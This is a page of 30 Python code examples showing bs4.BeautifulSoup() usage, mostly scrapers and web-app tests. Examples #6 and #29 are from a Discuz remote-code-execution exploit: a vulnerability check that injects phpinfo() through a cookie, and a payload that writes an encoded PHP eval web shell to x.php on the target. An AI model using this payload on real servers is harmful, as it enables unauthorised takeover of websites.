Python bs4.BeautifulSoup() Examples
The following are 30 code examples of bs4.BeautifulSoup(), collected from open-source projects. The project, source file, and license are noted above each example. You may also want to check out the other functions and classes available in the bs4 module.
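All of the examples build a parse tree by passing raw markup and a parser name (such as 'html.parser', 'lxml', or 'html5lib') to the BeautifulSoup constructor, then navigate the tree with methods like find, find_all, and select. A minimal sketch of that pattern, using a made-up HTML snippet purely for illustration:

import bs4

# Illustrative markup only; in the examples below the markup comes from requests/urllib responses.
html = '<html><body><a class="nav" href="/about/">About</a></body></html>'

soup = bs4.BeautifulSoup(html, 'html.parser')   # build the parse tree with the stdlib parser
link = soup.find('a', class_='nav')             # first <a> tag whose class is "nav"
print(link['href'], link.get_text())            # -> /about/ About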
Example #1
Source File: start.py From Starx_Pixiv_Collector with MIT License | 10 votes |
def get_pixiv_user_name():
    global login_status
    tag = 'Get_Pixiv_User_Name'
    # Check if cookies works.
    pixiv_www_url = 'https://www.pixiv.net/'
    check_soup = BeautifulSoup(get_text_from_url(pixiv_www_url), 'html.parser')
    try:
        pixiv_user_nick_name = check_soup.find(name='a', attrs={'class': 'user-name js-click-trackable-later'}).string
        print_with_tag(tag, ['Login as', pixiv_user_nick_name])
    except Exception as e:
        print_with_tag(tag, ['Error:', e])
        login_status = False
        print_with_tag(tag, 'Failed to check the user name.')
        print_with_tag(tag, 'Might be the cookies is out of the date?')
    else:
        login_status = True
        print_with_tag(tag, 'Login success!')
Example #2
Source File: gitgot.py From GitGot with GNU Lesser General Public License v3.0 | 7 votes |
def gist_fetch(query, page_idx, total_items=1000):
    gist_url = "https://gist.github.com/search?utf8=%E2%9C%93&q={}&p={}"
    query = urllib.parse.quote(query)
    gists = []

    try:
        resp = requests.get(gist_url.format(query, page_idx))
        soup = bs4.BeautifulSoup(resp.text, 'html.parser')
        total_items = min(total_items, int(
            [x.text.split()[0] for x in soup.find_all('h3')
             if "gist results" in x.text][0].replace(',', '')))
        gists = [x.get("href") for x in soup.findAll(
            "a", class_="link-overlay")]
    except IndexError:
        return {"data": None, "total_items": 0}

    return {"data": gists, "total_items": total_items}
Example #3
Source File: universal.py From xalpha with MIT License | 7 votes |
def get_rt_from_ft(code, _type="indices"):
    url = make_ft_url(code, _type=_type)
    r = rget(url)
    b = BeautifulSoup(r.text, "lxml")
    d = {}
    d["name"] = b.find("h1").string
    d["current"] = _float(b.find("span", class_="mod-ui-data-list__value").string)
    d["percent"] = _float(
        b.select("span[class^='mod-format--']")[0].text.split("/")[-1].strip()[:-1]
    )
    d["current_ext"] = None
    d["market"] = None
    d["currency"] = b.find("span", class_="mod-ui-data-list__label").string.split("(")[
        1
    ][:-1]
    d["time"] = b.find("div", class_="mod-disclaimer").string
    return d
Example #4
Source File: misc.py From xalpha with MIT License | 7 votes |
def get_tdx_holidays(holidays=None, format="%Y-%m-%d"):
    r = rget("https://www.tdx.com.cn/url/holiday/")
    r.encoding = "gbk"
    b = BeautifulSoup(r.text, "lxml")
    l = b.find("textarea").string.split("\n")
    if not holidays:
        holidays = {}
    for item in l:
        if item.strip():
            c = item.split("|")
            if c[2] in region_trans:
                rg = region_trans[c[2]]
                tobj = dt.datetime.strptime(c[0], "%Y%m%d")
                tstr = tobj.strftime(format)
                if rg not in holidays:
                    holidays[rg] = [tstr]
                else:
                    holidays[rg].append(tstr)
    return holidays
Example #5
Source File: test_exceptions_handler.py From sanic with MIT License | 7 votes |
def test_chained_exception_handler():
    request, response = exception_handler_app.test_client.get(
        "/6/0", debug=True
    )
    assert response.status == 500

    soup = BeautifulSoup(response.body, "html.parser")
    html = str(soup)

    assert "response = handler(request, *args, **kwargs)" in html
    assert "handler_6" in html
    assert "foo = 1 / arg" in html
    assert "ValueError" in html
    assert "The above exception was the direct cause" in html

    summary_text = " ".join(soup.select(".summary")[0].text.split())
    assert (
        "ZeroDivisionError: division by zero while handling path /6/0"
    ) == summary_text
Example #6
Source File: dz-ml-rce.py From discuz-ml-rce with MIT License | 7 votes |
def dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout):
    tgtUrl = tgtUrl
    check_payload = setcookie_language_value + '\'.phpinfo().\';'
    headers = {}
    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36"
    headers["Cookie"] = check_payload
    check_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
    # print headers['Cookie']
    if check_rsp.status_code == 200:
        try:
            if (check_rsp.text.index('PHP Version')):
                print 'target is vulnerable!!!'
            else:
                soup = BeautifulSoup(check_rsp.text, 'lxml')
                if (soup.find('title')):
                    print 'target seem not vulnerable-' + 'return title: ' + str(soup.title.string) + '\n'
        except ValueError, e:
            print 'target seem not vulnerable-' + e.__repr__()
        except:
            pass
Example #7
Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_edit_and_preview_links_on_schema_preview_page(self, testapp):
    department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True)

    # set up a user
    create_and_log_in_user(testapp, department)

    # make a request to specific front page
    for page in ['complaints', 'useofforce', 'ois', 'assaultsonofficers']:
        response = testapp.get("/department/{}/preview/schema/{}".format(department.id, page))
        assert response.status_code == 200
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/{}/edit/schema/{}".format(department.id, page)) is not None
        assert soup.find("a", href="/department/{}".format(department.id)) is not None
Example #8
Source File: start.py From Starx_Pixiv_Collector with MIT License | 6 votes |
def get_illust_infos_from_illust_url(url):
    data_dict = {}
    illust_url_content = get_text_from_url(url)
    # illust_url_content.encoding = 'unicode_escape'
    new_soup = BeautifulSoup(illust_url_content, 'html.parser')
    json_data = new_soup.find(name='meta', attrs={'name': 'preload-data'}).attrs['content']
    format_json_data = demjson.decode(json_data)
    pre_catch_id = list(format_json_data['illust'].keys())[0]
    illust_info = format_json_data['illust'][pre_catch_id]
    # get each value
    data_dict['illustId'] = illust_info['illustId']
    data_dict['illustTitle'] = illust_info['illustTitle']
    data_dict['illustComment'] = illust_info['illustComment']
    data_dict['createDate'] = illust_info['createDate']
    data_dict['illustType'] = illust_info['illustType']
    data_dict['urls'] = illust_info['urls']
    # data_dict['tags']=illust_info['tags']
    data_dict['userId'] = illust_info['userId']
    data_dict['userName'] = illust_info['userName']
    data_dict['userAccount'] = illust_info['userAccount']
    data_dict['likeData'] = illust_info['likeData']
    data_dict['width'] = illust_info['width']
    data_dict['height'] = illust_info['height']
    data_dict['pageCount'] = illust_info['pageCount']
    data_dict['bookmarkCount'] = illust_info['bookmarkCount']
    data_dict['likeCount'] = illust_info['likeCount']
    data_dict['commentCount'] = illust_info['commentCount']
    data_dict['viewCount'] = illust_info['viewCount']
    data_dict['isOriginal'] = illust_info['isOriginal']
    per_tags = illust_info['tags']['tags']
    tags_list = []
    for tag in range(len(per_tags)):
        tags_list.append(per_tags[tag]['tag'])
    data_dict['tags'] = tags_list
    ###########################################################
    update_database(data_dict['illustId'], data_dict['illustTitle'], data_dict['illustType'],
                    data_dict['userId'], data_dict['userName'], data_dict['tags'], data_dict['urls'])
    return data_dict
Example #9
Source File: ebay-watcher.py From ebay-watcher with MIT License | 6 votes |
def watch(self):
    '''
    () -> None
    Attempts to watch a product on eBay.
    '''
    # Get product watch link
    try:
        r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False)
    except:
        try:
            r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False)
        except:
            log('e', "Connection failed while loading product on " + self.product_link)
            return
    try:
        watch_link = soup(r.text, "html.parser").find("div", {"id": "vi-atl-lnk"}).a["href"]
    except:
        log('e', "Connection failed while loading product on " + self.product_link)
        return

    # Watch the product (the second GET actually adds it to watch list)
    try:
        r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
        r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
    except:
        try:
            r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
            r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
        except:
            log('e', "Failed to add " + self.product_link + " to watch list.")
            return

    # Alert user of progress: Watch product success/failure
    if ("saved in your" in r.text.lower()):
        log('s', "Added " + self.product_link + " to watch list.")
    else:
        log('e', "Couldn't add " + self.product_link + " to watch list.")
Example #10
Source File: google.py From fireprox with GNU General Public License v3.0 | 6 votes |
def check_query(count, url, query):
    if url[-1] == '/':
        url = url[:-1]
    url = f'{url}/search?q={query}&start={count}&num=100'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0',
    }
    results = requests.get(url, headers=headers)
    soup = BeautifulSoup(results.text, 'lxml')
    with add_lock:
        idx = 1
        for g in soup.find_all('div', class_='r'):
            link = g.find_all('a')[0]['href']
            title = g.find_all('h3')[0]
            item = f'{title.text} ({link})'
            search_results.add(item)
            idx += 1
Example #11
Source File: bing.py From fireprox with GNU General Public License v3.0 | 6 votes |
def check_query(count, url, query):
    if url[-1] == '/':
        url = url[:-1]
    url = f'{url}/search?q={query}&first={count}'
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0',
    }
    results = requests.get(url, headers=headers)
    soup = BeautifulSoup(results.text, 'lxml')
    with add_lock:
        idx = 1
        for g in soup.find_all('li', class_='b_algo'):
            result = g.find('h2')
            link = result.find('a')['href']
            title = result.text
            item = f'{title} ({link})'
            search_results.add(item)
            idx += 1
Example #12
Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_edit_and_preview_links_on_department_admin_page(self, testapp):
    ''' There are links to preview & edit main and schema pages from the department admin page. '''
    department = Department.create(name="B Police Department", short_name="BPD", load_defaults=True)

    # set up a user
    create_and_log_in_user(testapp, department)

    # make a request to specific front page
    response = testapp.get("/department/{}".format(department.id))
    assert response.status_code == 200
    soup = BeautifulSoup(response.text, "html.parser")
    assert soup.find("a", href="{}/preview/useofforce".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/complaints".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/ois".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/pursuits".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/assaultsonofficers".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/useofforce".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/complaints".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/ois".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/pursuits".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/assaultsonofficers".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/schema/useofforce".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/schema/complaints".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/schema/ois".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/schema/pursuits".format(department.id)) is not None
    assert soup.find("a", href="{}/preview/schema/assaultsonofficers".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/schema/useofforce".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/schema/complaints".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/schema/ois".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/schema/pursuits".format(department.id)) is not None
    assert soup.find("a", href="{}/edit/schema/assaultsonofficers".format(department.id)) is not None
Example #13
Source File: universal.py From xalpha with MIT License | 6 votes |
def get_portfolio_fromttjj(code, start=None, end=None):
    startobj = dt.datetime.strptime(start, "%Y%m%d")
    endobj = dt.datetime.strptime(end, "%Y%m%d")
    if (endobj - startobj).days < 90:
        return None  # note start is always 1.1 4.1 7.1 10.1 in incremental updates
    if code.startswith("F"):
        code = code[1:]
    r = rget("http://fundf10.eastmoney.com/zcpz_{code}.html".format(code=code))
    s = BeautifulSoup(r.text, "lxml")
    table = s.find("table", class_="tzxq")
    df = pd.read_html(str(table))[0]
    df["date"] = pd.to_datetime(df["报告期"])
    df["stock_ratio"] = df["股票占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    df["bond_ratio"] = df["债券占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    df["cash_ratio"] = df["现金占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    # df["dr_ratio"] = df["存托凭证占净比"].replace("---", "0%").apply(lambda s: xa.cons._float(s[:-1]))
    df["assets"] = df["净资产(亿元)"]
    df = df[::-1]
    return df[["date", "stock_ratio", "bond_ratio", "cash_ratio", "assets"]]


# this is the most elegant approach to dispatch get_daily, the definition can be such simple
# you actually don't need to bother on start end blah, everything is taken care of by ``cahcedio``
Example #14
Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_edit_and_preview_links_on_preview_page(self, testapp):
    department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True)

    # set up a user
    create_and_log_in_user(testapp, department)

    # make a request to specific front page
    for page in ['index', 'complaints', 'useofforce', 'ois', 'assaultsonofficers']:
        response = testapp.get("/department/{}/preview/{}".format(department.id, page))
        assert response.status_code == 200
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/{}/edit/{}".format(department.id, page)) is not None
        assert soup.find("a", href="/department/{}".format(department.id)) is not None
Example #15
Source File: Extractor.py From News-At-Command-Line with MIT License | 6 votes |
def ExtractionAlgo(self, text):
    soup = BeautifulSoup(text, 'html.parser')
    title = soup.title.string
    Result = []
    # print soup
    maincontent = soup.find_all("div", class_="content__article-body from-content-api js-article__body")
    # print maincontent
    for content in maincontent:
        scripttags = content.find_all(["script", "br", "figure", "image"])
        for scripttag in scripttags:
            scripttag.extract()
        # print content.text
        for foundcontent in content.find_all("p"):
            Result.append(foundcontent.text)
    Result = ''.join(Result)
    return (title, Result)
Example #16
Source File: Extractor.py From News-At-Command-Line with MIT License | 6 votes |
def ExtractionAlgo(self, text):
    soup = BeautifulSoup(text, 'html.parser')
    title = soup.title.string
    Result = []
    # print soup
    maincontent = soup.find_all("div", class_="article")
    # print maincontent
    for content in maincontent:
        scripttags = content.find_all(["script", "br", "figure", "image", "span"])
        for scripttag in scripttags:
            scripttag.extract()
        # print content.text
        for foundcontent in content.find_all("p"):
            Result.append(foundcontent.text)
    Result = ''.join(Result)
    return (title, Result)
Example #17
Source File: Extractor.py From News-At-Command-Line with MIT License | 6 votes |
def ExtractionAlgo(self, text):
    soup = BeautifulSoup(text, 'html.parser')
    title = soup.title.string
    Result = []
    # print soup
    maincontent = soup.find_all("div", class_="Normal")
    # print maincontent
    for content in maincontent:
        # print content.text
        Result.append(content.text)
    Result = ''.join(Result)
    return (title, Result)
Example #18
Source File: views.py From MPContribs with MIT License | 6 votes |
def export_notebook(nb, cid):
    nb = nbformat.from_dict(nb)
    html_exporter = HTMLExporter()
    html_exporter.template_file = "basic"
    body = html_exporter.from_notebook_node(nb)[0]
    soup = BeautifulSoup(body, "html.parser")
    # mark cells with special name for toggling, and
    # TODO make element id's unique by appending cid (for ingester)
    for div in soup.find_all("div", "output_wrapper"):
        script = div.find("script")
        if script:
            script = script.contents[0]
            if script.startswith("render_json"):
                div["name"] = "HData"
            elif script.startswith("render_table"):
                div["name"] = "Tables"
            elif script.startswith("render_plot"):
                div["name"] = "Graphs"
        else:
            pre = div.find("pre")
            if pre and pre.contents[0].startswith("Structure"):
                div["name"] = "Structures"
    # name divs for toggling code_cells
    for div in soup.find_all("div", "input"):
        div["name"] = "Code"
    # separate script
    script = []
    for s in soup.find_all("script"):
        script.append(s.string)
        s.extract()  # remove javascript
    return soup.prettify(), "\n".join(script)
Example #19
Source File: Extractor.py From News-At-Command-Line with MIT License | 6 votes |
def TextExtractionAlgo(self, text, htmlelement, classname):
    soup = BeautifulSoup(text, 'html.parser')
    title = soup.title.string
    Result = []
    # print soup
    maincontent = soup.find_all(htmlelement, class_=classname)
    # print maincontent
    for content in maincontent:
        scripttags = content.find_all(["script", "br", "figure", "image"])
        for scripttag in scripttags:
            scripttag.extract()
        # print content.text
        Result.append(content.text)
    Result = ''.join(Result)
    return (title, Result)
Example #20
Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_about_page_exists(self, testapp):
    response = testapp.get("/about/", status=200)
    soup = BeautifulSoup(response.text, "html.parser")
    assert soup.find("a", href="https://www.codeforamerica.org") is not None
Example #21
Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_non_public_depts_display_for_users_with_access(self, testapp):
    ''' Users can see links to datasets they're allowed to access on the front page '''
    impd = Department.create(name="I Police Department", short_name="IMPD", is_public=True)
    UseOfForceIncidentIMPD.create(department_id=impd.id, opaque_id="12345abcde")
    bpd = Department.create(name="B Police Department", short_name="BPD", is_public=False)
    UseOfForceIncidentBPD.create(department_id=bpd.id, opaque_id="12345abcde")
    lmpd = Department.create(name="LM Police Department", short_name="LMPD", is_public=False)
    UseOfForceIncidentLMPD.create(department_id=lmpd.id, opaque_id="12345abcde")

    # A non logged-in user can only see the public department
    response = testapp.get("/", status=200)
    soup = BeautifulSoup(response.text, "html.parser")
    assert soup.find("a", href="/department/IMPD/useofforce") is not None
    assert soup.find("a", href="/department/BPD/useofforce") is None
    assert soup.find("a", href="/department/LMPD/useofforce") is None

    # A user associated with a particular department can see that department's
    # available datasets when logged in
    create_and_log_in_user(testapp=testapp, department=bpd, username="user1")
    response = testapp.get("/", status=200)
    soup = BeautifulSoup(response.text, "html.parser")
    assert soup.find("a", href="/department/IMPD/useofforce") is not None
    assert soup.find("a", href="/department/BPD/useofforce") is not None
    assert soup.find("a", href="/department/LMPD/useofforce") is None

    # A user with admin access can see all departments' available datasets
    create_and_log_in_user(testapp=testapp, department=impd, rolename='admin', username="user2")
    response = testapp.get("/", status=200)
    soup = BeautifulSoup(response.text, "html.parser")
    assert soup.find("a", href="/department/IMPD/useofforce") is not None
    assert soup.find("a", href="/department/BPD/useofforce") is not None
    assert soup.find("a", href="/department/LMPD/useofforce") is not None

    # Log out and only the public department should be visible
    testapp.get(url_for('public.logout')).follow()
    response = testapp.get("/", status=200)
    soup = BeautifulSoup(response.text, "html.parser")
    assert soup.find("a", href="/department/IMPD/useofforce") is not None
    assert soup.find("a", href="/department/BPD/useofforce") is None
    assert soup.find("a", href="/department/LMPD/useofforce") is None
Example #22
Source File: misc.py From xalpha with MIT License | 6 votes |
def get_ri_status(suburl=None):
    if not suburl:
        suburl = "m=cb&a=cb_all"  # convertible bonds
    url = "http://www.richvest.com/index.php?"
    url += suburl
    r = rget(url, headers={"user-agent": "Mozilla/5.0"})
    b = BeautifulSoup(r.text, "lxml")
    cl = []
    for c in b.findAll("th"):
        cl.append(c.text)
    nocl = len(cl)
    rl = []
    for i, c in enumerate(b.findAll("td")):
        if i % nocl == 0:
            r = []
        r.append(c.text)
        if i % nocl == nocl - 1:
            rl.append(r)
    return pd.DataFrame(rl, columns=cl)
Example #23
Source File: proxyLoader.py From premeStock with MIT License | 6 votes |
def filterConnections(proxiesList):
    workingProxies = []
    count = 0
    for proxy in proxiesList:
        count += 1
        cprint("Loading proxy # {}".format(count), "green")
        proxies = {
            'http': proxy,
            'https': proxy
        }
        try:
            r = requests.get("http://www.supremenewyork.com/shop/all", proxies=proxies, timeout=1)
            data = r.text
            soup = BeautifulSoup(data, "html.parser")
            headerCheck = str(soup.find("span", {"id": "time-zone-name"}).text)
            if headerCheck == "NYC":
                cprint(headerCheck, "blue")
                workingProxies.append(proxy)
                cprint("Added {}!".format(proxy), "green")
            else:
                cprint("Banned!", "red")
                raise
        except:
            cprint("Bad Proxy: {}".format(proxy), "red")
    return workingProxies
Example #24
Source File: proxyLoader.py From premeStock with MIT License | 6 votes |
def site2(proxiesList):
    url = "https://www.us-proxy.org/"
    user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"}
    r = requests.get(url, headers=user)
    data = r.text
    soup = BeautifulSoup(data, "html.parser")
    table = soup.find("tbody")
    for ips in table.find_all("tr"):
        count = 0
        proxy = ""
        for ip in ips.find_all("td"):
            if count == 0:
                proxy = str(ip.text)
                proxy += ":"
            if count == 1:
                proxy += str(ip.text)
                proxiesList.append(proxy)
                break
            count += 1
    cprint("Succesfully added {} proxies!".format(len(proxiesList)), 'green')
Example #25
Source File: universal.py From xalpha with MIT License | 6 votes |
def get_newest_netvalue(code):
    """
    In case the fund aggregate API on 天天基金 is slow to refresh the latest net value,
    fetch the fund's most recently published net value and its date.
    Deprecated, use get_rt("F501018") instead.

    :param code: six digits string for fund.
    :return: netvalue, %Y-%m-%d
    """
    code = code[1:]
    r = rget("http://fund.eastmoney.com/{code}.html".format(code=code))
    s = BeautifulSoup(r.text, "lxml")
    return (
        float(
            s.findAll("dd", class_="dataNums")[1]
            .find("span", class_="ui-font-large")
            .string
        ),
        str(s.findAll("dt")[1]).split("(")[1].split(")")[0][7:],
    )
Example #26
Source File: proxyLoader.py From premeStock with MIT License | 6 votes |
def site4(proxiesList):
    url = "https://www.proxynova.com/proxy-server-list/country-us/"
    user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"}
    r = requests.get(url, headers=user)
    data = r.text
    soup = BeautifulSoup(data, "html.parser")
    proxy = ""
    # for ips in soup.find_all("tr", {"class": "spy1xx"}):
    for ips in soup.find_all("tr"):
        count = 0
        for ip in ips.find_all("td", {"align": "left"}):
            if count == 0:
                proxy = str(ip.get_text(strip=True).replace("document.write('", "").replace("'", "").replace("+", "").replace(");", "").replace(" ", ""))
            if count == 1:
                proxy += ":" + str(ip.text).strip()
                proxiesList.append(proxy)
                break
            count += 1
Example #27
Source File: Self.py From CyberTK-Self with GNU General Public License v2.0 | 6 votes |
def yt(query):
    with requests.session() as s:
        isi = []
        if query == "":
            query = "S1B tanysyz"
        s.headers['user-agent'] = 'Mozilla/5.0'
        url = 'http://www.youtube.com/results'
        params = {'search_query': query}
        r = s.get(url, params=params)
        soup = BeautifulSoup(r.content, 'html5lib')
        for a in soup.select('.yt-lockup-title > a[title]'):
            if '&list=' not in a['href']:
                if 'watch?v' in a['href']:
                    b = a['href'].replace('watch?v=', '')
                    isi += ['youtu.be' + b]
        return isi
Example #28
Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License | 6 votes |
def test_home_page_links_to_about(self, testapp):
    response = testapp.get("/", status=200)
    soup = BeautifulSoup(response.text, "html.parser")
    assert soup.find("a", href="/about/") is not None
Example #29
Source File: dz-ml-rce.py From discuz-ml-rce with MIT License | 5 votes |
def dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout):
    getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';'
    getshell_exp_send = setcookie_language_value + getshell_exp
    headers = {}
    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36"
    headers['Cookie'] = getshell_exp_send
    filename = tgtUrl.split('/')[-1]
    getshell_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
    # print headers['Cookie']
    if getshell_rsp.status_code == 200:
        getshell_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False)
        # print tgtUrl.split('/')[-1]
        # print tgtUrl.split(filename)[0] + 'x.php'
        if (getshell_rsp1.status_code) == 200 and (getshell_rsp1.text == ""):
            print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php'
        else:
            # soup = BeautifulSoup(getshell_rsp1.text, 'lxml')
            print 'Getshell failed!-rsp1 status code: ' + str(getshell_rsp1.status_code) + '\nrsp1 text: ' + getshell_rsp1.text[0:100]
    else:
        print 'Target seem not vulnerable-status code: ' + str(getshell_rsp.status_code) + '\n'
Example #30
Source File: get_recipes.py From recipe-box with MIT License | 5 votes |
def get_all_recipes_epi(page_num):
    base_url = 'http://www.epicurious.com'
    search_url_str = 'search/?content=recipe&page'
    url = '{}/{}={}'.format(base_url, search_url_str, page_num)

    try:
        soup = BeautifulSoup(request.urlopen(
            request.Request(url, headers=HEADERS)).read(), "html.parser")
        recipe_link_items = soup.select('div.results-group article.recipe-content-card a.view-complete-item')
        recipe_links = [r['href'] for r in recipe_link_items]
        return {base_url + r: get_recipe(base_url + r) for r in recipe_links}
    except (HTTPError, URLError):
        print('Could not parse page {}'.format(url))
        return []